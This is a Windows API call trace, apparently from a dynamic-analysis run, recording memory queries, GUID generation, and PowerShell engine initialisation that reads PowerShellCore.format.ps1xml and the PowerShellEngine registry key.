[0079.939] VirtualQuery (in: lpAddress=0x16baa0, lpBuffer=0x16c960, dwLength=0x30 | out: lpBuffer=0x16c960*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.939] CoCreateGuid (in: pguid=0x16d290 | out: pguid=0x16d290*(Data1=0x464ed62e, Data2=0x8bc1, Data3=0x4070, Data4=([0]=0xab, [1]=0x6a, [2]=0x12, [3]=0x78, [4]=0x20, [5]=0x59, [6]=0x64, [7]=0xbb))) returned 0x0
[0079.939] VirtualQuery (in: lpAddress=0x16ba10, lpBuffer=0x16c8d0, dwLength=0x30 | out: lpBuffer=0x16c8d0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.939] VirtualQuery (in: lpAddress=0x16baa0, lpBuffer=0x16c960, dwLength=0x30 | out: lpBuffer=0x16c960*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.940] VirtualQuery (in: lpAddress=0x16ba10, lpBuffer=0x16c8d0, dwLength=0x30 | out: lpBuffer=0x16c8d0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.940] VirtualQuery (in: lpAddress=0x16baa0, lpBuffer=0x16c960, dwLength=0x30 | out: lpBuffer=0x16c960*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0080.018] VirtualQuery (in: lpAddress=0x16baa0, lpBuffer=0x16c960, dwLength=0x30 | out: lpBuffer=0x16c960*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0080.018] VirtualQuery (in: lpAddress=0x16ba10, lpBuffer=0x16c8d0, dwLength=0x30 | out: lpBuffer=0x16c8d0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0080.018] VirtualQuery (in: lpAddress=0x16baa0, lpBuffer=0x16c960, dwLength=0x30 | out: lpBuffer=0x16c960*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0080.018] VirtualQuery (in: lpAddress=0x16ba10, lpBuffer=0x16c8d0, dwLength=0x30 | out: lpBuffer=0x16c8d0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0080.019] VirtualQuery (in: lpAddress=0x16baa0, lpBuffer=0x16c960, dwLength=0x30 | out: lpBuffer=0x16c960*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0080.019] VirtualQuery (in: lpAddress=0x16ba10, lpBuffer=0x16c8d0, dwLength=0x30 | out: lpBuffer=0x16c8d0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0080.019] VirtualQuery (in: lpAddress=0x16baa0, lpBuffer=0x16c960, dwLength=0x30 | out: lpBuffer=0x16c960*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0080.019] VirtualQuery (in: lpAddress=0x16b6e0, lpBuffer=0x16c5a0, dwLength=0x30 | out: lpBuffer=0x16c5a0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0080.019] VirtualQuery (in: lpAddress=0x16ba10, lpBuffer=0x16c8d0, dwLength=0x30 | out: lpBuffer=0x16c8d0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0080.019] VirtualQuery (in: lpAddress=0x16baa0, lpBuffer=0x16c960, dwLength=0x30 | out: lpBuffer=0x16c960*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0080.019] VirtualQuery (in: lpAddress=0x16ba10, lpBuffer=0x16c8d0, dwLength=0x30 | out: lpBuffer=0x16c8d0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0080.020] VirtualQuery (in: lpAddress=0x16baa0, lpBuffer=0x16c960, dwLength=0x30 | out: lpBuffer=0x16c960*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0080.020] CoCreateGuid (in: pguid=0x16d290 | out: pguid=0x16d290*(Data1=0x672e0190, Data2=0x5377, Data3=0x4071, Data4=([0]=0xb0, [1]=0xda, [2]=0xb4, [3]=0x95, [4]=0xdd, [5]=0x38, [6]=0x49, [7]=0x94))) returned 0x0
[0080.020] CoCreateGuid (in: pguid=0x16d290 | out: pguid=0x16d290*(Data1=0xfc3c6dd3, Data2=0x28dd, Data3=0x4c0a, Data4=([0]=0x8c, [1]=0x3f, [2]=0xdf, [3]=0x9e, [4]=0x1b, [5]=0x88, [6]=0x4a, [7]=0x9e))) returned 0x0
[0080.020] CoCreateGuid (in: pguid=0x16d290 | out: pguid=0x16d290*(Data1=0xaad8e5be, Data2=0x92ef, Data3=0x4e15, Data4=([0]=0x9c, [1]=0xf3, [2]=0x12, [3]=0x90, [4]=0x85, [5]=0xfd, [6]=0x1, [7]=0xde))) returned 0x0
[0080.020] CoCreateGuid (in: pguid=0x16d290 | out: pguid=0x16d290*(Data1=0xc3c8479b, Data2=0x7daa, Data3=0x4aa3, Data4=([0]=0x9e, [1]=0xa7, [2]=0xfd, [3]=0x6a, [4]=0xf6, [5]=0xba, [6]=0x74, [7]=0xcf))) returned 0x0
[0080.020] CoCreateGuid (in: pguid=0x16d290 | out: pguid=0x16d290*(Data1=0xe4979a96, Data2=0x3748, Data3=0x4b31, Data4=([0]=0x9c, [1]=0xbd, [2]=0x51, [3]=0xe, [4]=0x9, [5]=0x44, [6]=0x77, [7]=0xaf))) returned 0x0
[0080.021] VirtualQuery (in: lpAddress=0x16b7f0, lpBuffer=0x16c6b0, dwLength=0x30 | out: lpBuffer=0x16c6b0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0080.021] VirtualQuery (in: lpAddress=0x16b880, lpBuffer=0x16c740, dwLength=0x30 | out: lpBuffer=0x16c740*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0080.021] CoCreateGuid (in: pguid=0x16d290 | out: pguid=0x16d290*(Data1=0x5153ca0f, Data2=0xa7e, Data3=0x46cb, Data4=([0]=0xa6, [1]=0x60, [2]=0xe4, [3]=0x48, [4]=0x27, [5]=0xbf, [6]=0x54, [7]=0x41))) returned 0x0
[0080.021] CoCreateGuid (in: pguid=0x16d290 | out: pguid=0x16d290*(Data1=0xbef757d9, Data2=0x2cce, Data3=0x4575, Data4=([0]=0x82, [1]=0xac, [2]=0xb0, [3]=0x30, [4]=0x4b, [5]=0xa7, [6]=0xfa, [7]=0x23))) returned 0x0
[0080.021] CoCreateGuid (in: pguid=0x16d290 | out: pguid=0x16d290*(Data1=0xf48fe4b8, Data2=0xec35, Data3=0x4865, Data4=([0]=0xb0, [1]=0x4a, [2]=0x24, [3]=0x4e, [4]=0x7d, [5]=0xba, [6]=0x7c, [7]=0x59))) returned 0x0
[0080.021] SetErrorMode (uMode=0x1) returned 0x1
[0080.021] SetErrorMode (uMode=0x1) returned 0x1
[0080.021] GetFileType (hFile=0x30c) returned 0x1
[0080.023] SetErrorMode (uMode=0x1) returned 0x1
[0080.023] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x16cf80 | out: lpFileInformation=0x16cf80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e9dda3, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e9dda3, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x15e67)) returned 1
[0080.024] SetErrorMode (uMode=0x1) returned 0x1
[0080.024] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16ccb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
[0080.024] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d068 | out: phkResult=0x16d068*=0x30c) returned 0x0
[0080.024] RegQueryValueExW (in: hKey=0x30c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16cfec, lpData=0x0, lpcbData=0x16cfe8*=0x0 | out: lpType=0x16cfec*=0x1, lpData=0x0, lpcbData=0x16cfe8*=0x56) returned 0x0
[0080.024] CoTaskMemAlloc (cb=0x5a) returned 0x2f9460
[0080.024] RegQueryValueExW (in: hKey=0x30c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16cfbc, lpData=0x2f9460, lpcbData=0x16cfb8*=0x56 | out: lpType=0x16cfbc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x16cfb8*=0x56) returned 0x0
[0080.024] CoTaskMemFree (pv=0x2f9460)
[0080.024] RegCloseKey (hKey=0x30c) returned 0x0
[0080.024] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16ccb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
[0080.024] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16cb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
[0080.026] CoCreateGuid (in: pguid=0x16d290 | out: pguid=0x16d290*(Data1=0xb7d37cb9, Data2=0x7e83, Data3=0x4f68, Data4=([0]=0xb1, [1]=0xcc, [2]=0x9, [3]=0x63, [4]=0xa2, [5]=0x74, [6]=0x3c, [7]=0xad))) returned 0x0
[0080.026] CoCreateGuid (in: pguid=0x16d290 | out: pguid=0x16d290*(Data1=0x343bf927, Data2=0xdd0c, Data3=0x4370, Data4=([0]=0x8c, [1]=0xe3, [2]=0xab, [3]=0x39, [4]=0xc0, [5]=0x79, [6]=0xb9, [7]=0xa8))) returned 0x0
[0080.026] CoCreateGuid (in: pguid=0x16d290 | out: pguid=0x16d290*(Data1=0xaf0daae5, Data2=0x1515, Data3=0x40a9, Data4=([0]=0x82, [1]=0xa, [2]=0x1e, [3]=0xc7, [4]=0xa, [5]=0x46, [6]=0xda, [7]=0xe3))) returned 0x0
[0080.027] CoCreateGuid (in: pguid=0x16d290 | out: pguid=0x16d290*(Data1=0xeeecf11, Data2=0x9068, Data3=0x4f8b, Data4=([0]=0xb6, [1]=0xd7, [2]=0xe6, [3]=0xd8, [4]=0x88, [5]=0xa3, [6]=0x84, [7]=0x58))) returned 0x0
[0080.027] CoCreateGuid (in: pguid=0x16d290 | out: pguid=0x16d290*(Data1=0x69705f61, Data2=0x8a0c, Data3=0x4e81, Data4=([0]=0x95, [1]=0x80, [2]=0xde, [3]=0x67, [4]=0x29, [5]=0x7f, [6]=0x4f, [7]=0xfd))) returned 0x0
[0080.027] CoCreateGuid (in: pguid=0x16d290 | out: pguid=0x16d290*(Data1=0x9c8f410e, Data2=0xbb99, Data3=0x427e, Data4=([0]=0xb2, [1]=0x85, [2]=0x16, [3]=0xa1, [4]=0x53, [5]=0xc, [6]=0x5d, [7]=0x99))) returned 0x0
[0080.027] CoCreateGuid (in: pguid=0x16d290 | out: pguid=0x16d290*(Data1=0x376af89d, Data2=0xe06b, Data3=0x4d07, Data4=([0]=0xbf, [1]=0xfa, [2]=0x9c, [3]=0x34, [4]=0xcb, [5]=0xb0, [6]=0xd0, [7]=0x3f))) returned 0x0
[0080.027] VirtualQuery (in: lpAddress=0x16bc40, lpBuffer=0x16cb00, dwLength=0x30 | out: lpBuffer=0x16cb00*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0080.027] CoCreateGuid (in: pguid=0x16d290 | out: pguid=0x16d290*(Data1=0xd47a84a4, Data2=0xc8c9, Data3=0x4599, Data4=([0]=0x89, [1]=0xe1, [2]=0xb2, [3]=0xb5, [4]=0xf2, [5]=0x99, [6]=0x98, [7]=0x25))) returned 0x0
[0080.027] CoCreateGuid (in: pguid=0x16d290 | out: pguid=0x16d290*(Data1=0xa90ae33d, Data2=0x16b9, Data3=0x4b44, Data4=([0]=0xb9, [1]=0xa7, [2]=0xf7, [3]=0xc8, [4]=0x41, [5]=0x89, [6]=0xb6, [7]=0x3))) returned 0x0
[0080.027] CoCreateGuid (in: pguid=0x16d290 | out: pguid=0x16d290*(Data1=0xfccf1a7d, Data2=0x3833, Data3=0x45ce, Data4=([0]=0xa7, [1]=0xbd, [2]=0x88, [3]=0x9f, [4]=0xc2, [5]=0x85, [6]=0x81, [7]=0xde))) returned 0x0
[0080.027] CoCreateGuid (in: pguid=0x16d290 | out: pguid=0x16d290*(Data1=0x142a44b, Data2=0x3c4c, Data3=0x4a4b, Data4=([0]=0x8b, [1]=0xb9, [2]=0xc8, [3]=0x36, [4]=0x84, [5]=0xf9, [6]=0x60, [7]=0x6b))) returned 0x0
[0080.027] CoCreateGuid (in: pguid=0x16d290 | out: pguid=0x16d290*(Data1=0x39fdf33, Data2=0x5069, Data3=0x43cd, Data4=([0]=0xa2, [1]=0x38, [2]=0x94, [3]=0x9, [4]=0x65, [5]=0xea, [6]=0x82, [7]=0xe7))) returned 0x0
[0080.027] CoCreateGuid (in: pguid=0x16d290 | out: pguid=0x16d290*(Data1=0xd6ade9ef, Data2=0x9fca, Data3=0x423d, Data4=([0]=0x85, [1]=0x26, [2]=0x7d, [3]=0x94, [4]=0x8b, [5]=0x67, [6]=0xde, [7]=0xb5))) returned 0x0
[0080.028] CoCreateGuid (in: pguid=0x16d290 | out: pguid=0x16d290*(Data1=0x7f3fb52b, Data2=0x5519, Data3=0x4461, Data4=([0]=0xac, [1]=0x86, [2]=0x56, [3]=0x12, [4]=0x64, [5]=0x87, [6]=0x9a, [7]=0xe3))) returned 0x0
[0080.028] CoCreateGuid (in: pguid=0x16d290 | out: pguid=0x16d290*(Data1=0x4f53b75c, Data2=0x93d1, Data3=0x4a33, Data4=([0]=0xb4, [1]=0x36, [2]=0xa4, [3]=0xa7, [4]=0xbb, [5]=0x29, [6]=0xb8, [7]=0x82))) returned 0x0
[0080.028] CoCreateGuid (in: pguid=0x16d290 | out: pguid=0x16d290*(Data1=0x122f6fa4, Data2=0xd76e, Data3=0x4fba, Data4=([0]=0xb4, [1]=0x0, [2]=0x4b, [3]=0x9c, [4]=0x22, [5]=0xc, [6]=0xa7, [7]=0x8d))) returned 0x0
[0080.028] CoCreateGuid (in: pguid=0x16d290 | out: pguid=0x16d290*(Data1=0x17955bf3, Data2=0x6c02, Data3=0x441d, Data4=([0]=0xa3, [1]=0xf2, [2]=0xe4, [3]=0xb7, [4]=0x57, [5]=0xb9, [6]=0xc8, [7]=0x97))) returned 0x0
[0080.028] CoCreateGuid (in: pguid=0x16d290 | out: pguid=0x16d290*(Data1=0xdd7d42de, Data2=0xc564, Data3=0x4421, Data4=([0]=0x94, [1]=0x1b, [2]=0x0, [3]=0x97, [4]=0x30, [5]=0xc9, [6]=0x2a, [7]=0xde))) returned 0x0
[0080.028] CoCreateGuid (in: pguid=0x16d290 | out: pguid=0x16d290*(Data1=0x10b3eca2, Data2=0x8400, Data3=0x4651, Data4=([0]=0x83, [1]=0xee, [2]=0xe1, [3]=0xe, [4]=0x95, [5]=0x16, [6]=0x9c, [7]=0xa))) returned 0x0
[0080.028] VirtualQuery (in: lpAddress=0x16bc40, lpBuffer=0x16cb00, dwLength=0x30 | out: lpBuffer=0x16cb00*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0080.028] VirtualQuery (in: lpAddress=0x16bc40, lpBuffer=0x16cb00, dwLength=0x30 | out: lpBuffer=0x16cb00*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0080.029] VirtualQuery (in: lpAddress=0x16bc40, lpBuffer=0x16cb00, dwLength=0x30 | out: lpBuffer=0x16cb00*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0080.029] CoCreateGuid (in: pguid=0x16d290 | out: pguid=0x16d290*(Data1=0xcc0197eb, Data2=0x8b5a, Data3=0x4ab8, Data4=([0]=0x8b, [1]=0x92, [2]=0x9e, [3]=0x26, [4]=0x45, [5]=0x44, [6]=0x6d, [7]=0x41))) returned 0x0
[0080.029] CoCreateGuid (in: pguid=0x16d290 | out: pguid=0x16d290*(Data1=0x20efe084, Data2=0xb73f, Data3=0x4265, Data4=([0]=0x91, [1]=0x6, [2]=0x62, [3]=0x30, [4]=0x42, [5]=0x75, [6]=0x6b, [7]=0xa0))) returned 0x0
[0080.029] CoCreateGuid (in: pguid=0x16d290 | out: pguid=0x16d290*(Data1=0x551fce92, Data2=0x4943, Data3=0x470d, Data4=([0]=0x97, [1]=0x64, [2]=0x34, [3]=0x3f, [4]=0xb3, [5]=0x39, [6]=0x44, [7]=0x6))) returned 0x0
[0080.029] CoCreateGuid (in: pguid=0x16d290 | out: pguid=0x16d290*(Data1=0xeec74b33, Data2=0x1106, Data3=0x4d6e, Data4=([0]=0xaf, [1]=0xe9, [2]=0x0, [3]=0xda, [4]=0x59, [5]=0x3a, [6]=0xcb, [7]=0x5c))) returned 0x0
[0080.029] CoCreateGuid (in: pguid=0x16d290 | out: pguid=0x16d290*(Data1=0xd982cf49, Data2=0x7982, Data3=0x41c6, Data4=([0]=0xb8, [1]=0x9a, [2]=0x8a, [3]=0xa2, [4]=0x89, [5]=0x53, [6]=0xea, [7]=0x2b))) returned 0x0
[0080.029] CoCreateGuid (in: pguid=0x16d290 | out: pguid=0x16d290*(Data1=0x7d2a3409, Data2=0x6939, Data3=0x4ebd, Data4=([0]=0xb5, [1]=0x9f, [2]=0x3e, [3]=0x26, [4]=0xe6, [5]=0x58, [6]=0x1, [7]=0x13))) returned 0x0
[0080.029] CoCreateGuid (in: pguid=0x16d290 | out: pguid=0x16d290*(Data1=0x8a7a85c1, Data2=0xde68, Data3=0x475f, Data4=([0]=0x92, [1]=0x8, [2]=0x63, [3]=0xc9, [4]=0x1a, [5]=0x81, [6]=0xde, [7]=0x72))) returned 0x0
[0080.029] CoCreateGuid (in: pguid=0x16d290 | out: pguid=0x16d290*(Data1=0x1425e766, Data2=0xc750, Data3=0x42e7, Data4=([0]=0x98, [1]=0x4b, [2]=0xe5, [3]=0xa1, [4]=0x79, [5]=0xf, [6]=0x24, [7]=0xd3))) returned 0x0
[0080.029] CoCreateGuid (in: pguid=0x16d290 | out: pguid=0x16d290*(Data1=0xbe4d6f62, Data2=0xc905, Data3=0x419f, Data4=([0]=0xa0, [1]=0x83, [2]=0xbd, [3]=0x41, [4]=0x33, [5]=0x24, [6]=0x83, [7]=0xf1))) returned 0x0
[0080.030] CoCreateGuid (in: pguid=0x16d290 | out: pguid=0x16d290*(Data1=0x1d6cd05f, Data2=0xfab3, Data3=0x4da3, Data4=([0]=0x9d, [1]=0x69, [2]=0x1, [3]=0xe8, [4]=0x61, [5]=0x9d, [6]=0x99, [7]=0xe4))) returned 0x0
[0080.030] CoCreateGuid (in: pguid=0x16d290 | out: pguid=0x16d290*(Data1=0xb5b2d259, Data2=0x96fe, Data3=0x4261, Data4=([0]=0xba, [1]=0xe6, [2]=0xfe, [3]=0xc0, [4]=0x32, [5]=0xb0, [6]=0xeb, [7]=0xd6))) returned 0x0
[0080.030] CoCreateGuid (in: pguid=0x16d290 | out: pguid=0x16d290*(Data1=0x356c4356, Data2=0x98c9, Data3=0x4221, Data4=([0]=0xac, [1]=0x4d, [2]=0x25, [3]=0xd6, [4]=0x6c, [5]=0x34, [6]=0x60, [7]=0x98))) returned 0x0
[0080.030] CoCreateGuid (in: pguid=0x16d290 | out: pguid=0x16d290*(Data1=0x81b803ac, Data2=0x7e23, Data3=0x4547, Data4=([0]=0xb6, [1]=0xf2, [2]=0x36, [3]=0x17, [4]=0xb9, [5]=0x97, [6]=0x75, [7]=0xa9))) returned 0x0
[0080.030] VirtualQuery (in: lpAddress=0x16bc40, lpBuffer=0x16cb00, dwLength=0x30 | out: lpBuffer=0x16cb00*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0080.030] CoCreateGuid (in: pguid=0x16d290 | out: pguid=0x16d290*(Data1=0x61006a91, Data2=0xee0f, Data3=0x4fff, Data4=([0]=0xbe, [1]=0x6b, [2]=0x6a, [3]=0x5f, [4]=0x32, [5]=0x2f, [6]=0x67, [7]=0x44))) returned 0x0
[0080.030] VirtualQuery (in: lpAddress=0x16bc40, lpBuffer=0x16cb00, dwLength=0x30 | out: lpBuffer=0x16cb00*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0080.031] VirtualQuery (in: lpAddress=0x16bc40, lpBuffer=0x16cb00, dwLength=0x30 | out: lpBuffer=0x16cb00*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0080.032] CoCreateGuid (in: pguid=0x16d290 | out: pguid=0x16d290*(Data1=0xd9567443, Data2=0xfece, Data3=0x4d7f, Data4=([0]=0xbd, [1]=0x86, [2]=0xa3, [3]=0xec, [4]=0xc2, [5]=0xb2, [6]=0xc2, [7]=0x17))) returned 0x0
[0080.032] VirtualQuery (in: lpAddress=0x16bc40, lpBuffer=0x16cb00, dwLength=0x30 | out: lpBuffer=0x16cb00*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0080.032] CoCreateGuid (in: pguid=0x16d290 | out: pguid=0x16d290*(Data1=0x10e55089, Data2=0xe02c, Data3=0x4c8a, Data4=([0]=0x8c, [1]=0xdd, [2]=0x4e, [3]=0xb, [4]=0xab, [5]=0x5c, [6]=0x22, [7]=0xc0))) returned 0x0
[0080.032] CoCreateGuid (in: pguid=0x16d290 | out: pguid=0x16d290*(Data1=0x7723f466, Data2=0x8744, Data3=0x4b00, Data4=([0]=0xa8, [1]=0x61, [2]=0x8e, [3]=0x79, [4]=0xfb, [5]=0xb2, [6]=0x45, [7]=0x1f))) returned 0x0
[0080.032] CoCreateGuid (in: pguid=0x16d290 | out: pguid=0x16d290*(Data1=0x617abf56, Data2=0x132d, Data3=0x4acf, Data4=([0]=0x9e, [1]=0xf, [2]=0xe7, [3]=0x94, [4]=0x6, [5]=0xfe, [6]=0x99, [7]=0x91))) returned 0x0
[0080.033] CoCreateGuid (in: pguid=0x16d290 | out: pguid=0x16d290*(Data1=0xce28e35e, Data2=0xb03, Data3=0x43da, Data4=([0]=0x8b, [1]=0x12, [2]=0xf4, [3]=0x8b, [4]=0xe7, [5]=0x29, [6]=0xba, [7]=0x5))) returned 0x0
[0080.033] CoCreateGuid (in: pguid=0x16d290 | out: pguid=0x16d290*(Data1=0xe342bb61, Data2=0x593a, Data3=0x4aa5, Data4=([0]=0x8d, [1]=0x13, [2]=0x47, [3]=0x8e, [4]=0x0, [5]=0x7, [6]=0x97, [7]=0xc0))) returned 0x0
[0080.033] CoCreateGuid (in: pguid=0x16d290 | out: pguid=0x16d290*(Data1=0xc045e10d, Data2=0xb343, Data3=0x4ff6, Data4=([0]=0x95, [1]=0xab, [2]=0x87, [3]=0x2b, [4]=0x7d, [5]=0x58, [6]=0x97, [7]=0x93))) returned 0x0
[0080.033] CoCreateGuid (in: pguid=0x16d290 | out: pguid=0x16d290*(Data1=0x46d08272, Data2=0xcd17, Data3=0x4d75, Data4=([0]=0xb9, [1]=0xb6, [2]=0x70, [3]=0x74, [4]=0x41, [5]=0xf2, [6]=0x74, [7]=0xfb))) returned 0x0
[0080.033] VirtualQuery (in: lpAddress=0x16bc40, lpBuffer=0x16cb00, dwLength=0x30 | out: lpBuffer=0x16cb00*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0080.033] CoCreateGuid (in: pguid=0x16d290 | out: pguid=0x16d290*(Data1=0xfaa290e6, Data2=0x6144, Data3=0x4892, Data4=([0]=0xa6, [1]=0xa5, [2]=0x36, [3]=0xb5, [4]=0x9c, [5]=0xa8, [6]=0x4c, [7]=0xd2))) returned 0x0
[0080.033] CoCreateGuid (in: pguid=0x16d290 | out: pguid=0x16d290*(Data1=0x647a2c64, Data2=0xb3e7, Data3=0x467f, Data4=([0]=0xa9, [1]=0x47, [2]=0xe2, [3]=0x73, [4]=0x95, [5]=0xd, [6]=0xb9, [7]=0x1c))) returned 0x0
[0080.039] CoCreateGuid (in: pguid=0x16d290 | out: pguid=0x16d290*(Data1=0x19a67d3e, Data2=0x7786, Data3=0x4857, Data4=([0]=0xb9, [1]=0x4, [2]=0xbf, [3]=0xe, [4]=0xc7, [5]=0xe7, [6]=0xc8, [7]=0xf3))) returned 0x0
[0080.039] CoCreateGuid (in: pguid=0x16d290 | out: pguid=0x16d290*(Data1=0x8b49d03b, Data2=0x1f0c, Data3=0x4f37, Data4=([0]=0x8e, [1]=0x59, [2]=0x61, [3]=0xb7, [4]=0xc9, [5]=0x1, [6]=0xf3, [7]=0x6c))) returned 0x0
[0080.039] CoCreateGuid (in: pguid=0x16d290 | out: pguid=0x16d290*(Data1=0xb566395a, Data2=0x7ebd, Data3=0x47eb, Data4=([0]=0xb5, [1]=0x4e, [2]=0x23, [3]=0x10, [4]=0x6a, [5]=0x3d, [6]=0x5c, [7]=0x5a))) returned 0x0
[0080.040] VirtualQuery (in: lpAddress=0x16bc40, lpBuffer=0x16cb00, dwLength=0x30 | out: lpBuffer=0x16cb00*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
